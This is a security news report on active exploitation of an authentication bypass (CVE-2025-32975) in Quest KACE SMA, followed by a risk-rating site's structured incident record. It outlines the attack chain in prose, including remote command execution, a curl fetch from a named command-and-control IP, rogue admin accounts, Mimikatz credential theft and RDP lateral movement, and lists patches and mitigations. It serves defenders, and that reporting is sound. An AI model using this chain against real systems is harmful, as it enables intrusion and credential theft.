Critical Quest KACE SMA Vulnerability Exploited in Active Attacks
Security researchers have uncovered active exploitation of a severe authentication bypass flaw in Quest KACE Systems Management Appliance (SMA), tracked as CVE-2025-32975, allowing attackers to gain full administrative control over vulnerable systems. The vulnerability affects the appliance’s Single Sign-On (SSO) mechanism, enabling threat actors to impersonate legitimate users without credentials.
Quest KACE SMA is widely deployed for endpoint management, including software deployment, patching, and device monitoring, making it a prime target due to its deep integration into enterprise networks. Despite a patch being released in May 2025, many organizations remain unprotected, with exploitation activity first observed the week of March 9, 2026.
Attackers exploit the flaw to bypass authentication, then use the KPluginRunProcess feature to execute remote commands via Base64-encoded payloads. In documented cases, they leveraged curl commands to fetch additional malware from a command-and-control server (216.126.225.156). Persistence is established by abusing runkbot.exe to create rogue administrative accounts and deploying PowerShell scripts (e.g., Enable-UpdateServices.ps1, taskband.ps1) to modify registry settings and maintain access across reboots.
Once inside, attackers harvest credentials using Mimikatz (disguised as asd.exe) and conduct lateral movement via RDP, targeting domain controllers and backup systems (including Veeam and Veritas). This escalation increases risks of data theft, ransomware, or full network compromise.
Affected versions include 13.0, 13.1, and 13.2, with fixes available in 13.0.385, 13.1.81, and 13.2.183 or later. Newer deployments (14.0, 14.1) require Patch 5 (14.0.341) and Patch 4 (14.1.101), respectively. Researchers also recommend removing KACE SMA from public internet exposure and restricting access via VPNs or secure network boundaries to mitigate risks. The campaign underscores the dangers of unpatched systems and the rapid weaponization of known vulnerabilities.
Source: https://cyberpress.org/quest-kace-sma-flaw/
Quest Global cybersecurity rating report: https://www.rankiteo.com/company/quest-global
"id": "QUE1774275950",
"linkid": "quest-global",
"type": "Vulnerability",
"date": "3/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'industry': ['Enterprise', 'IT Management'],
'name': 'Quest KACE SMA Users',
'type': 'Organizations'}],
'attack_vector': 'Exploitation of unpatched vulnerability (CVE-2025-32975)',
'data_breach': {'data_exfiltration': True,
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Credentials',
'Administrative Access']},
'date_detected': '2026-03-09',
'description': 'Security researchers have uncovered active exploitation of a '
'severe authentication bypass flaw in Quest KACE Systems '
'Management Appliance (SMA), tracked as CVE-2025-32975, '
'allowing attackers to gain full administrative control over '
'vulnerable systems. The vulnerability affects the appliance’s '
'Single Sign-On (SSO) mechanism, enabling threat actors to '
'impersonate legitimate users without credentials. Attackers '
'exploit the flaw to bypass authentication, execute remote '
'commands, establish persistence, harvest credentials, and '
'conduct lateral movement via RDP, targeting domain '
'controllers and backup systems.',
'impact': {'data_compromised': True,
'identity_theft_risk': True,
'operational_impact': 'Full administrative control over vulnerable '
'systems',
'systems_affected': ['Endpoint Management Systems',
'Domain Controllers',
'Backup Systems']},
'initial_access_broker': {'backdoors_established': ['Rogue administrative '
'accounts',
'PowerShell scripts'],
'entry_point': 'Exploitation of CVE-2025-32975',
'high_value_targets': ['Domain Controllers',
'Backup Systems']},
'lessons_learned': 'The campaign underscores the dangers of unpatched systems '
'and the rapid weaponization of known vulnerabilities.',
'motivation': ['Data Theft', 'Ransomware', 'Network Compromise'],
'post_incident_analysis': {'corrective_actions': ['Patch management',
'Network access '
'restrictions'],
'root_causes': ['Unpatched vulnerability '
'(CVE-2025-32975)',
'Public exposure of KACE SMA']},
'ransomware': {'data_exfiltration': True},
'recommendations': ['Apply patches immediately',
'Remove KACE SMA from public internet exposure',
'Restrict access via VPNs or secure network boundaries',
'Monitor for lateral movement and credential harvesting'],
'references': [{'source': 'Security Research Report'}],
'response': {'containment_measures': ['Removing KACE SMA from public internet '
'exposure',
'Restricting access via VPNs or secure '
'network boundaries'],
'remediation_measures': ['Applying patches (13.0.385, 13.1.81, '
'13.2.183 or later)',
'Applying Patch 5 (14.0.341) and Patch '
'4 (14.1.101) for newer deployments']},
'title': 'Critical Quest KACE SMA Vulnerability Exploited in Active Attacks',
'type': 'Authentication Bypass',
'vulnerability_exploited': 'CVE-2025-32975'}